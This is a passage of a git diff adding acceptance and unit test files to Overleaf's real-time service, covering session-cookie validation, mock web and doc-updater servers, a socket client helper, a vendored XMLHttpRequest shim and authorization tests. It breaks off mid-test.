b/services/real-time/test/acceptance/js/SessionSocketsTests.js @@ -0,0 +1,140 @@ +const RealTimeClient = require('./helpers/RealTimeClient') +const FixturesManager = require('./helpers/FixturesManager') +const Settings = require('@overleaf/settings') +const signature = require('cookie-signature') +const { expect } = require('chai') + +describe('SessionSockets', function () { + beforeEach(function (done) { + FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + }, + (err, options) => { + if (err) return done(err) + + this.checkSocket = function (fn) { + RealTimeClient.connect(options.project_id, fn) + } + done() + } + ) + }) + + describe('without cookies', function () { + beforeEach(function () { + RealTimeClient.cookie = null + }) + + it('should return a lookup error', function (done) { + this.checkSocket(error => { + expect(error).to.exist + expect(error.message).to.equal('invalid session') + done() + }) + }) + }) + + describe('with a different cookie', function () { + beforeEach(function () { + RealTimeClient.cookie = 'some.key=someValue' + }) + + it('should return a lookup error', function (done) { + this.checkSocket(error => { + expect(error).to.exist + expect(error.message).to.equal('invalid session') + done() + }) + }) + }) + + describe('with an invalid cookie', function () { + beforeEach(function (done) { + RealTimeClient.setSession({}, error => { + if (error) { + return done(error) + } + RealTimeClient.cookie = `${ + Settings.cookieName + }=${RealTimeClient.cookie.slice(17, 49)}` + done() + }) + }) + + it('should return a lookup error', function (done) { + this.checkSocket(error => { + expect(error).to.exist + expect(error.message).to.equal('invalid session') + done() + }) + }) + }) + + describe('with a valid cookie and no matching session', function () { + beforeEach(function () { + RealTimeClient.cookie = `${Settings.cookieName}=unknownId` + }) + + it('should return a lookup error', function (done) { + this.checkSocket(error => { + expect(error).to.exist + expect(error.message).to.equal('invalid session') + done() + }) + }) + }) + + describe('with a valid cookie and a matching session', function () { + it('should not return an error', function (done) { + this.checkSocket(error => { + expect(error).to.not.exist + done() + }) + }) + }) + + describe('with a cookie signed by the fallback key and a matching session', function () { + beforeEach(function () { + RealTimeClient.cookie = + RealTimeClient.cookieSignedWith.sessionSecretFallback + }) + it('should not return an error', function (done) { + this.checkSocket(error => { + expect(error).to.not.exist + done() + }) + }) + }) + + describe('with a cookie signed by the upcoming key and a matching session', function () { + beforeEach(function () { + RealTimeClient.cookie = + RealTimeClient.cookieSignedWith.sessionSecretUpcoming + }) + it('should not return an error', function (done) { + this.checkSocket(error => { + expect(error).to.not.exist + done() + }) + }) + }) + + describe('with a cookie signed with an unrecognized secret and a matching session', function () { + beforeEach(function () { + const [sessionKey] = RealTimeClient.cookie.split('.') + // sign the session key with a unrecognized secret + RealTimeClient.cookie = signature.sign( + sessionKey, + 'unrecognised-session-secret' + ) + }) + it('should return a lookup error', function (done) { + this.checkSocket(error => { + expect(error).to.exist + expect(error.message).to.equal('invalid session') + done() + }) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/SessionTests.js b/services/real-time/test/acceptance/js/SessionTests.js new file mode 100644 index 0000000..819ec26 --- /dev/null +++ b/services/real-time/test/acceptance/js/SessionTests.js @@ -0,0 +1,55 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') + +const FixturesManager = require('./helpers/FixturesManager') +const RealTimeClient = require('./helpers/RealTimeClient') + +describe('Session', function () { + return describe('with an established session', function () { + before(function (done) { + FixturesManager.setUpProject( + { privilegeLevel: 'owner' }, + (error, options) => { + if (error) return done(error) + this.client = RealTimeClient.connect(options.project_id, done) + } + ) + return null + }) + + it('should not get disconnected', function (done) { + let disconnected = false + this.client.on('disconnect', () => (disconnected = true)) + return setTimeout(() => { + expect(disconnected).to.equal(false) + return done() + }, 500) + }) + + return it('should appear in the list of connected clients', function (done) { + return RealTimeClient.getConnectedClients((error, clients) => { + if (error) return done(error) + let included = false + for (const client of Array.from(clients)) { + if (client.client_id === this.client.socket.sessionid) { + included = true + break + } + } + expect(included).to.equal(true) + return done() + }) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/helpers/FixturesManager.js b/services/real-time/test/acceptance/js/helpers/FixturesManager.js new file mode 100644 index 0000000..1db0c68 --- /dev/null +++ b/services/real-time/test/acceptance/js/helpers/FixturesManager.js @@ -0,0 +1,156 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let FixturesManager +const RealTimeClient = require('./RealTimeClient') +const MockWebServer = require('./MockWebServer') +const MockDocUpdaterServer = require('./MockDocUpdaterServer') + +module.exports = FixturesManager = { + setUpProject(options, callback) { + if (options == null) { + options = {} + } + if (callback == null) { + callback = function () {} + } + if (!options.user_id) { + options.user_id = FixturesManager.getRandomId() + } + if (!options.project_id) { + options.project_id = FixturesManager.getRandomId() + } + if (!options.project) { + options.project = { name: 'Test Project' } + } + let { + project_id: projectId, + user_id: userId, + privilegeLevel, + project, + publicAccess, + userMetadata, + anonymousAccessToken, + } = options + + if (privilegeLevel === 'owner') { + project.owner = { _id: userId } + } else { + project.owner = { _id: '404404404404404404404404' } + } + + const privileges = {} + privileges[userId] = privilegeLevel + if (publicAccess) { + anonymousAccessToken = + anonymousAccessToken || FixturesManager.getRandomId() + privileges[anonymousAccessToken] = publicAccess + } + + const metadataByUser = {} + metadataByUser[userId] = userMetadata + + MockWebServer.createMockProject( + projectId, + privileges, + project, + metadataByUser + ) + return MockWebServer.run(error => { + if (error != null) { + throw error + } + return RealTimeClient.setSession( + { + user: { + _id: userId, + first_name: 'Joe', + last_name: 'Bloggs', + }, + }, + error => { + if (error != null) { + throw error + } + return callback(null, { + project_id: projectId, + user_id: userId, + privilegeLevel, + project, + anonymousAccessToken, + }) + } + ) + }) + }, + + setUpDoc(projectId, options, callback) { + if (options == null) { + options = {} + } + if (callback == null) { + callback = function () {} + } + if (!options.doc_id) { + options.doc_id = FixturesManager.getRandomId() + } + if (!options.lines) { + options.lines = ['doc', 'lines'] + } + if (!options.version) { + options.version = 42 + } + if (!options.ops) { + options.ops = ['mock', 'ops'] + } + const { doc_id: docId, lines, version, ops, ranges } = options + + MockDocUpdaterServer.createMockDoc(projectId, docId, { + lines, + version, + ops, + ranges, + }) + return MockDocUpdaterServer.run(error => { + if (error != null) { + throw error + } + return callback(null, { + project_id: projectId, + doc_id: docId, + lines, + version, + ops, + }) + }) + }, + + setUpEditorSession(options, callback) { + FixturesManager.setUpProject(options, (err, detailsProject) => { + if (err) return callback(err) + + FixturesManager.setUpDoc( + detailsProject.project_id, + options, + (err, detailsDoc) => { + if (err) return callback(err) + + callback(null, Object.assign({}, detailsProject, detailsDoc)) + } + ) + }) + }, + + getRandomId() { + return require('node:crypto') + .createHash('sha1') + .update(Math.random().toString()) + .digest('hex') + .slice(0, 24) + }, +} diff --git a/services/real-time/test/acceptance/js/helpers/MockDocUpdaterServer.js b/services/real-time/test/acceptance/js/helpers/MockDocUpdaterServer.js new file mode 100644 index 0000000..29d5718 --- /dev/null +++ b/services/real-time/test/acceptance/js/helpers/MockDocUpdaterServer.js @@ -0,0 +1,91 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let MockDocUpdaterServer +const sinon = require('sinon') +const express = require('express') + +module.exports = MockDocUpdaterServer = { + docs: {}, + + createMockDoc(projectId, docId, data) { + return (MockDocUpdaterServer.docs[`${projectId}:${docId}`] = data) + }, + + getDocument(projectId, docId, fromVersion, callback) { + if (callback == null) { + callback = function () {} + } + return callback(null, MockDocUpdaterServer.docs[`${projectId}:${docId}`]) + }, + + deleteProject: sinon.stub().callsArg(1), + + getDocumentRequest(req, res, next) { + const { project_id: projectId, doc_id: docId } = req.params + let { fromVersion } = req.query + fromVersion = parseInt(fromVersion, 10) + return MockDocUpdaterServer.getDocument( + projectId, + docId, + fromVersion, + (error, data) => { + if (error != null) { + return next(error) + } + if (!data) { + return res.sendStatus(404) + } + return res.json(data) + } + ) + }, + + deleteProjectRequest(req, res, next) { + const { project_id: projectId } = req.params + return MockDocUpdaterServer.deleteProject(projectId, error => { + if (error != null) { + return next(error) + } + return res.sendStatus(204) + }) + }, + + running: false, + run(callback) { + if (callback == null) { + callback = function () {} + } + if (MockDocUpdaterServer.running) { + return callback() + } + const app = express() + app.get( + '/project/:project_id/doc/:doc_id', + MockDocUpdaterServer.getDocumentRequest + ) + app.delete( + '/project/:project_id', + MockDocUpdaterServer.deleteProjectRequest + ) + return app + .listen(3003, error => { + MockDocUpdaterServer.running = true + return callback(error) + }) + .on('error', error => { + console.error('error starting MockDocUpdaterServer:', error.message) + return process.exit(1) + }) + }, +} + +sinon.spy(MockDocUpdaterServer, 'getDocument') diff --git a/services/real-time/test/acceptance/js/helpers/MockWebServer.js b/services/real-time/test/acceptance/js/helpers/MockWebServer.js new file mode 100644 index 0000000..138db1f --- /dev/null +++ b/services/real-time/test/acceptance/js/helpers/MockWebServer.js @@ -0,0 +1,106 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let MockWebServer +const sinon = require('sinon') +const express = require('express') +const bodyParser = require('body-parser') + +module.exports = MockWebServer = { + projects: {}, + privileges: {}, + userMetadata: {}, + + createMockProject(projectId, privileges, project, metadataByUser) { + MockWebServer.privileges[projectId] = privileges + MockWebServer.userMetadata[projectId] = metadataByUser + return (MockWebServer.projects[projectId] = project) + }, + + inviteUserToProject(projectId, user, privileges) { + MockWebServer.privileges[projectId][user._id] = privileges + MockWebServer.userMetadata[projectId][user._id] = user + }, + + joinProject(projectId, userId, anonymousAccessToken, callback) { + if (callback == null) { + callback = function () {} + } + const project = MockWebServer.projects[projectId] + const privilegeLevel = + MockWebServer.privileges[projectId]?.[userId] || + MockWebServer.privileges[projectId]?.[anonymousAccessToken] + const userMetadata = MockWebServer.userMetadata[projectId]?.[userId] + return callback(null, project, privilegeLevel, userMetadata) + }, + + joinProjectRequest(req, res, next) { + const { project_id: projectId } = req.params + const { anonymousAccessToken, userId } = req.body + if (projectId === '404404404404404404404404') { + // not-found + return res.status(404).send() + } + if (projectId === '403403403403403403403403') { + // forbidden + return res.status(403).send() + } + if (projectId === '429429429429429429429429') { + // rate-limited + return res.status(429).send() + } else { + return MockWebServer.joinProject( + projectId, + userId, + anonymousAccessToken, + (error, project, privilegeLevel, userMetadata) => { + if (error != null) { + return next(error) + } + if (!project) { + return res.sendStatus(404) + } + return res.json({ + project, + privilegeLevel, + isRestrictedUser: !!userMetadata?.isRestrictedUser, + isTokenMember: !!userMetadata?.isTokenMember, + isInvitedMember: !!userMetadata?.isInvitedMember, + }) + } + ) + } + }, + + running: false, + run(callback) { + if (callback == null) { + callback = function () {} + } + if (MockWebServer.running) { + return callback() + } + const app = express() + app.use(bodyParser.json()) + app.post('/project/:project_id/join', MockWebServer.joinProjectRequest) + return app + .listen(3000, error => { + MockWebServer.running = true + return callback(error) + }) + .on('error', error => { + console.error('error starting MockWebServer:', error.message) + return process.exit(1) + }) + }, +} + +sinon.spy(MockWebServer, 'joinProject') diff --git a/services/real-time/test/acceptance/js/helpers/RealTimeClient.js b/services/real-time/test/acceptance/js/helpers/RealTimeClient.js new file mode 100644 index 0000000..7b53f5d --- /dev/null +++ b/services/real-time/test/acceptance/js/helpers/RealTimeClient.js @@ -0,0 +1,165 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let Client +const { XMLHttpRequest } = require('../../libs/XMLHttpRequest') +const io = require('socket.io-client') +const async = require('async') + +const request = require('request') +const Settings = require('@overleaf/settings') +const redis = require('@overleaf/redis-wrapper') +const rclient = redis.createClient(Settings.redis.websessions) + +const uid = require('uid-safe').sync +const signature = require('cookie-signature') + +io.util.request = function () { + const xhr = new XMLHttpRequest() + const _open = xhr.open + xhr.open = function () { + _open.apply(xhr, arguments) + if (Client.cookie != null) { + return xhr.setRequestHeader('Cookie', Client.cookie) + } + } + return xhr +} + +module.exports = Client = { + cookie: null, + + setSession(session, callback) { + if (callback == null) { + callback = function () {} + } + const sessionId = uid(24) + session.cookie = {} + return rclient.set('sess:' + sessionId, JSON.stringify(session), error => { + if (error != null) { + return callback(error) + } + Client.cookieSignedWith = {} + // prepare cookie strings for all supported session secrets + for (const secretName of [ + 'sessionSecret', + 'sessionSecretFallback', + 'sessionSecretUpcoming', + ]) { + const secret = Settings.security[secretName] + const cookieKey = 's:' + signature.sign(sessionId, secret) + Client.cookieSignedWith[secretName] = + `${Settings.cookieName}=${cookieKey}` + } + // default to the current session secret + Client.cookie = Client.cookieSignedWith.sessionSecret + return callback() + }) + }, + + setAnonSession(projectId, anonymousAccessToken, callback) { + Client.setSession( + { + anonTokenAccess: { + [projectId]: anonymousAccessToken, + }, + }, + callback + ) + }, + + unsetSession(callback) { + if (callback == null) { + callback = function () {} + } + Client.cookie = null + return callback() + }, + + connect(projectId, callback) { + const client = io.connect('http://127.0.0.1:3026', { + 'force new connection': true, + query: new URLSearchParams({ projectId }).toString(), + }) + let disconnected = false + client.on('disconnect', () => { + disconnected = true + }) + client.on('connectionRejected', err => { + // Wait for disconnect ahead of continuing with the test sequence. + setTimeout(() => { + if (!disconnected) { + throw new Error('should disconnect after connectionRejected') + } + callback(err) + }, 10) + }) + client.on('joinProjectResponse', resp => { + const { publicId, project, permissionsLevel, protocolVersion } = resp + client.publicId = publicId + callback(null, project, permissionsLevel, protocolVersion) + }) + return client + }, + + getConnectedClients(callback) { + if (callback == null) { + callback = function () {} + } + return request.get( + { + url: 'http://127.0.0.1:3026/clients', + json: true, + }, + (error, response, data) => callback(error, data) + ) + }, + + getConnectedClient(clientId, callback) { + if (callback == null) { + callback = function () {} + } + return request.get( + { + url: `http://127.0.0.1:3026/clients/${clientId}`, + json: true, + }, + (error, response, data) => { + if (response?.statusCode === 404) { + callback(new Error('not found')) + } else { + callback(error, data) + } + } + ) + }, + + disconnectClient(clientId, callback) { + request.post( + { + url: `http://127.0.0.1:3026/client/${clientId}/disconnect`, + }, + (error, response, data) => callback(error, data) + ) + return null + }, + + disconnectAllClients(callback) { + return Client.getConnectedClients((error, clients) => { + if (error) return callback(error) + async.each( + clients, + (clientView, cb) => Client.disconnectClient(clientView.client_id, cb), + callback + ) + }) + }, +} diff --git a/services/real-time/test/acceptance/js/helpers/RealtimeServer.js b/services/real-time/test/acceptance/js/helpers/RealtimeServer.js new file mode 100644 index 0000000..be3a6f4 --- /dev/null +++ b/services/real-time/test/acceptance/js/helpers/RealtimeServer.js @@ -0,0 +1,61 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS103: Rewrite code to no longer use __guard__ + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const app = require('../../../../app') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') + +module.exports = { + running: false, + initing: false, + callbacks: [], + ensureRunning(callback) { + if (callback == null) { + callback = function () {} + } + if (this.running) { + return callback() + } else if (this.initing) { + return this.callbacks.push(callback) + } else { + this.initing = true + this.callbacks.push(callback) + return app.listen( + __guard__( + Settings.internal != null ? Settings.internal.realtime : undefined, + x => x.port + ), + '127.0.0.1', + error => { + if (error != null) { + throw error + } + this.running = true + logger.info('clsi running in dev mode') + + return (() => { + const result = [] + for (callback of Array.from(this.callbacks)) { + result.push(callback()) + } + return result + })() + } + ) + } + }, +} + +function __guard__(value, transform) { + return typeof value !== 'undefined' && value !== null + ? transform(value) + : undefined +} diff --git a/services/real-time/test/acceptance/libs/XMLHttpRequest.js b/services/real-time/test/acceptance/libs/XMLHttpRequest.js new file mode 100644 index 0000000..3586f44 --- /dev/null +++ b/services/real-time/test/acceptance/libs/XMLHttpRequest.js @@ -0,0 +1,579 @@ +/** + * Wrapper for built-in http.js to emulate the browser XMLHttpRequest object. + * + * This can be used with JS designed for browsers to improve reuse of code and + * allow the use of existing libraries. + * + * Usage: include("XMLHttpRequest.js") and use XMLHttpRequest per W3C specs. + * + * @author Dan DeFelippi <dan@driverdan.com> + * @contributor David Ellis <d.f.ellis@ieee.org> + * @license MIT + */ + +const { URL } = require('node:url') +const spawn = require('node:child_process').spawn +const fs = require('node:fs') + +exports.XMLHttpRequest = function () { + /** + * Private variables + */ + const self = this + const http = require('node:http') + const https = require('node:https') + + // Holds http.js objects + let request + let response + + // Request settings + let settings = {} + + // Set some default headers + const defaultHeaders = { + 'User-Agent': 'node-XMLHttpRequest', + Accept: '*/*', + } + + let headers = defaultHeaders + + // These headers are not user setable. + // The following are allowed but banned in the spec: + // * user-agent + const forbiddenRequestHeaders = [ + 'accept-charset', + 'accept-encoding', + 'access-control-request-headers', + 'access-control-request-method', + 'connection', + 'content-length', + 'content-transfer-encoding', + // "cookie", + 'cookie2', + 'date', + 'expect', + 'host', + 'keep-alive', + 'origin', + 'referer', + 'te', + 'trailer', + 'transfer-encoding', + 'upgrade', + 'via', + ] + + // These request methods are not allowed + const forbiddenRequestMethods = ['TRACE', 'TRACK', 'CONNECT'] + + // Send flag + let sendFlag = false + // Error flag, used when errors occur or abort is called + let errorFlag = false + + // Event listeners + const listeners = {} + + /** + * Constants + */ + + this.UNSENT = 0 + this.OPENED = 1 + this.HEADERS_RECEIVED = 2 + this.LOADING = 3 + this.DONE = 4 + + /** + * Public vars + */ + + // Current state + this.readyState = this.UNSENT + + // default ready state change handler in case one is not set or is set late + this.onreadystatechange = null + + // Result & response + this.responseText = '' + this.responseXML = '' + this.status = null + this.statusText = null + + /** + * Private methods + */ + + /** + * Check if the specified header is allowed. + * + * @param string header Header to validate + * @return boolean False if not allowed, otherwise true + */ + const isAllowedHttpHeader = function (header) { + return ( + header && forbiddenRequestHeaders.indexOf(header.toLowerCase()) === -1 + ) + } + + /** + * Check if the specified method is allowed. + * + * @param string method Request method to validate + * @return boolean False if not allowed, otherwise true + */ + const isAllowedHttpMethod = function (method) { + return method && forbiddenRequestMethods.indexOf(method) === -1 + } + + /** + * Public methods + */ + + /** + * Open the connection. Currently supports local server requests. + * + * @param string method Connection method (eg GET, POST) + * @param string url URL for the connection. + * @param boolean async Asynchronous connection. Default is true. + * @param string user Username for basic authentication (optional) + * @param string password Password for basic authentication (optional) + */ + this.open = function (method, url, async, user, password) { + this.abort() + errorFlag = false + + // Check for valid request method + if (!isAllowedHttpMethod(method)) { + throw new Error('SecurityError: Request method not allowed') + } + + settings = { + method, + url: url.toString(), + async: typeof async !== 'boolean' ? true : async, + user: user || null, + password: password || null, + } + + setState(this.OPENED) + } + + /** + * Sets a header for the request. + * + * @param string header Header name + * @param string value Header value + */ + this.setRequestHeader = function (header, value) { + if (this.readyState !== this.OPENED) { + throw new Error( + 'INVALID_STATE_ERR: setRequestHeader can only be called when state is OPEN' + ) + } + if (!isAllowedHttpHeader(header)) { + console.warn('Refused to set unsafe header "' + header + '"') + return + } + if (sendFlag) { + throw new Error('INVALID_STATE_ERR: send flag is true') + } + headers[header] = value + } + + /** + * Gets a header from the server response. + * + * @param string header Name of header to get. + * @return string Text of the header or null if it doesn't exist. + */ + this.getResponseHeader = function (header) { + if ( + typeof header === 'string' && + this.readyState > this.OPENED && + response.headers[header.toLowerCase()] && + !errorFlag + ) { + return response.headers[header.toLowerCase()] + } + + return null + } + + /** + * Gets all the response headers. + * + * @return string A string with all response headers separated by CR+LF + */ + this.getAllResponseHeaders = function () { + if (this.readyState < this.HEADERS_RECEIVED || errorFlag) { + return '' + } + let result = '' + + for (const i in response.headers) { + // Cookie headers are excluded + if (i !== 'set-cookie' && i !== 'set-cookie2') { + result += i + ': ' + response.headers[i] + '\r\n' + } + } + return result.substr(0, result.length - 2) + } + + /** + * Gets a request header + * + * @param string name Name of header to get + * @return string Returns the request header or empty string if not set + */ + this.getRequestHeader = function (name) { + // @TODO Make this case insensitive + if (typeof name === 'string' && headers[name]) { + return headers[name] + } + + return '' + } + + /** + * Sends the request to the server. + * + * @param string data Optional data to send as request body. + */ + this.send = function (data) { + if (this.readyState !== this.OPENED) { + throw new Error( + 'INVALID_STATE_ERR: connection must be opened before send() is called' + ) + } + + if (sendFlag) { + throw new Error('INVALID_STATE_ERR: send has already been called') + } + + let host + let ssl = false + let local = false + const url = new URL(settings.url) + + // Determine the server + switch (url.protocol) { + case 'https:': + ssl = true + host = url.hostname + break + case 'http:': + host = url.hostname + break + + case 'file:': + local = true + break + + case undefined: + case '': + host = '127.0.0.1' + break + + default: + throw new Error('Protocol not supported.') + } + + // Load files off the local filesystem (file://) + if (local) { + if (settings.method !== 'GET') { + throw new Error('XMLHttpRequest: Only GET method is supported') + } + + if (settings.async) { + fs.readFile(url.pathname, 'utf8', (error, data) => { + if (error) { + self.handleError(error) + } else { + self.status = 200 + self.responseText = data + setState(self.DONE) + } + }) + } else { + try { + this.responseText = fs.readFileSync(url.pathname, 'utf8') + this.status = 200 + setState(self.DONE) + } catch (e) { + this.handleError(e) + } + } + + return + } + + // Default to port 80. If accessing 127.0.0.1 on another port be sure + // to use http://127.0.0.1:port/path + const port = url.port || (ssl ? 443 : 80) + // Add query string if one is used + const uri = url.pathname + (url.search ? url.search : '') + + // Set the Host header or the server may reject the request + headers.Host = host + if (!((ssl && port === 443) || port === 80)) { + headers.Host += ':' + url.port + } + + // Set Basic Auth if necessary + if (settings.user) { + if (typeof settings.password === 'undefined') { + settings.password = '' + } + const authBuf = Buffer.from(settings.user + ':' + settings.password) + headers.Authorization = 'Basic ' + authBuf.toString('base64') + } + + // Set content length header + if (settings.method === 'GET' || settings.method === 'HEAD') { + data = null + } else if (data) { + headers['Content-Length'] = Buffer.byteLength(data) + + if (!headers['Content-Type']) { + headers['Content-Type'] = 'text/plain;charset=UTF-8' + } + } else if (settings.method === 'POST') { + // For a post with no data set Content-Length: 0. + // This is required by buggy servers that don't meet the specs. + headers['Content-Length'] = 0 + } + + const options = { + host, + port, + path: uri, + method: settings.method, + headers, + } + + // Reset error flag + errorFlag = false + + // Handle async requests + if (settings.async) { + // Use the proper protocol + const doRequest = ssl ? https.request : http.request + + // Request is being sent, set send flag + sendFlag = true + + // As per spec, this is called here for historical reasons. + self.dispatchEvent('readystatechange') + + // Create the request + request = doRequest(options, resp => { + response = resp + response.setEncoding('utf8') + + setState(self.HEADERS_RECEIVED) + self.status = response.statusCode + + response.on('data', chunk => { + // Make sure there's some data + if (chunk) { + self.responseText += chunk + } + // Don't emit state changes if the connection has been aborted. + if (sendFlag) { + setState(self.LOADING) + } + }) + + response.on('end', () => { + if (sendFlag) { + // Discard the 'end' event if the connection has been aborted + setState(self.DONE) + sendFlag = false + } + }) + + response.on('error', error => { + self.handleError(error) + }) + }).on('error', error => { + self.handleError(error) + }) + + // Node 0.4 and later won't accept empty data. Make sure it's needed. + if (data) { + request.write(data) + } + + request.end() + + self.dispatchEvent('loadstart') + } else { + // Synchronous + // Create a temporary file for communication with the other Node process + const syncFile = '.node-xmlhttprequest-sync-' + process.pid + fs.writeFileSync(syncFile, '', 'utf8') + // The async request the other Node process executes + const execString = + "var http = require('http'), https = require('https'), fs = require('fs');" + + 'var doRequest = http' + + (ssl ? 's' : '') + + '.request;' + + 'var options = ' + + JSON.stringify(options) + + ';' + + "var responseText = '';" + + 'var req = doRequest(options, function(response) {' + + "response.setEncoding('utf8');" + + "response.on('data', function(chunk) {" + + 'responseText += chunk;' + + '});' + + "response.on('end', function() {" + + "fs.writeFileSync('" + + syncFile + + "', 'NODE-XMLHTTPREQUEST-STATUS:' + response.statusCode + ',' + responseText, 'utf8');" + + '});' + + "response.on('error', function(error) {" + + "fs.writeFileSync('" + + syncFile + + "', 'NODE-XMLHTTPREQUEST-ERROR:' + JSON.stringify(error), 'utf8');" + + '});' + + "}).on('error', function(error) {" + + "fs.writeFileSync('" + + syncFile + + "', 'NODE-XMLHTTPREQUEST-ERROR:' + JSON.stringify(error), 'utf8');" + + '});' + + (data ? "req.write('" + data.replace(/'/g, "\\'") + "');" : '') + + 'req.end();' + // Start the other Node Process, executing this string + const syncProc = spawn(process.argv[0], ['-e', execString]) + while ((self.responseText = fs.readFileSync(syncFile, 'utf8')) === '') { + // Wait while the file is empty + } + // Kill the child process once the file has data + syncProc.stdin.end() + // Remove the temporary file + fs.unlinkSync(syncFile) + if (self.responseText.match(/^NODE-XMLHTTPREQUEST-ERROR:/)) { + // If the file returned an error, handle it + const errorObj = self.responseText.replace( + /^NODE-XMLHTTPREQUEST-ERROR:/, + '' + ) + self.handleError(errorObj) + } else { + // If the file returned okay, parse its data and move to the DONE state + self.status = self.responseText.replace( + /^NODE-XMLHTTPREQUEST-STATUS:([0-9]*),.*/, + '$1' + ) + self.responseText = self.responseText.replace( + /^NODE-XMLHTTPREQUEST-STATUS:[0-9]*,(.*)/, + '$1' + ) + setState(self.DONE) + } + } + } + + /** + * Called when an error is encountered to deal with it. + */ + this.handleError = function (error) { + this.status = 503 + this.statusText = error + this.responseText = error.stack + errorFlag = true + setState(this.DONE) + } + + /** + * Aborts a request. + */ + this.abort = function () { + if (request) { + request.abort() + request = null + } + + headers = defaultHeaders + this.responseText = '' + this.responseXML = '' + + errorFlag = true + + if ( + this.readyState !== this.UNSENT && + (this.readyState !== this.OPENED || sendFlag) && + this.readyState !== this.DONE + ) { + sendFlag = false + setState(this.DONE) + } + this.readyState = this.UNSENT + } + + /** + * Adds an event listener. Preferred method of binding to events. + */ + this.addEventListener = function (event, callback) { + if (!(event in listeners)) { + listeners[event] = [] + } + // Currently allows duplicate callbacks. Should it? + listeners[event].push(callback) + } + + /** + * Remove an event callback that has already been bound. + * Only works on the matching funciton, cannot be a copy. + */ + this.removeEventListener = function (event, callback) { + if (event in listeners) { + // Filter will return a new array with the callback removed + listeners[event] = listeners[event].filter(ev => { + return ev !== callback + }) + } + } + + /** + * Dispatch any events, including both "on" methods and events attached using addEventListener. + */ + this.dispatchEvent = function (event) { + if (typeof self['on' + event] === 'function') { + self['on' + event]() + } + if (event in listeners) { + for (let i = 0, len = listeners[event].length; i < len; i++) { + listeners[event][i].call(self) + } + } + } + + /** + * Changes readyState and calls onreadystatechange. + * + * @param int state New state + */ + function setState(state) { + if (self.readyState !== state) { + self.readyState = state + + if ( + settings.async || + self.readyState < self.OPENED || + self.readyState === self.DONE + ) { + self.dispatchEvent('readystatechange') + } + + if (self.readyState === self.DONE && !errorFlag) { + self.dispatchEvent('load') + // @TODO figure out InspectorInstrumentation::didLoadXHR(cookie) + self.dispatchEvent('loadend') + } + } + } +} diff --git a/services/real-time/test/setup.js b/services/real-time/test/setup.js new file mode 100644 index 0000000..c213049 --- /dev/null +++ b/services/real-time/test/setup.js @@ -0,0 +1,47 @@ +const chai = require('chai') +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const chaiAsPromised = require('chai-as-promised') +const sinonChai = require('sinon-chai') + +// Chai configuration +chai.should() +chai.use(chaiAsPromised) +chai.use(sinonChai) + +// Global stubs +const sandbox = sinon.createSandbox() +const stubs = { + logger: { + debug: sandbox.stub(), + log: sandbox.stub(), + info: sandbox.stub(), + warn: sandbox.stub(), + err: sandbox.stub(), + error: sandbox.stub(), + }, +} + +// SandboxedModule configuration +SandboxedModule.configure({ + requires: { + '@overleaf/logger': stubs.logger, + }, + globals: { Buffer, JSON, console, process }, + sourceTransformers: { + removeNodePrefix: function (source) { + return source.replace(/require\(['"]node:/g, "require('") + }, + }, +}) + +// Mocha hooks +exports.mochaHooks = { + beforeEach() { + this.logger = stubs.logger + }, + + afterEach() { + sandbox.reset() + }, +} diff --git a/services/real-time/test/unit/js/AuthorizationManagerTests.js b/services/real-time/test/unit/js/AuthorizationManagerTests.js new file mode 100644 index 0000000..a23d814 --- /dev/null +++ b/services/real-time/test/unit/js/AuthorizationManagerTests.js @@ -0,0 +1,428 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') +const sinon = require('sinon') +const SandboxedModule = require('sandboxed-module') +const path = require('node:path') +const modulePath = '../../../app/js/AuthorizationManager' + +describe('AuthorizationManager', function () { + beforeEach(function () { + this.client = { ol_context: {} } + + return (this.AuthorizationManager = SandboxedModule.require(modulePath, { + requires: {}, + })) + }) + + describe('assertClientCanViewProject', function () { + it('should allow the readOnly privilegeLevel', function (done) { + this.client.ol_context.privilege_level = 'readOnly' + return this.AuthorizationManager.assertClientCanViewProject( + this.client, + error => { + expect(error).to.be.null + return done() + } + ) + }) + + it('should allow the readAndWrite privilegeLevel', function (done) { + 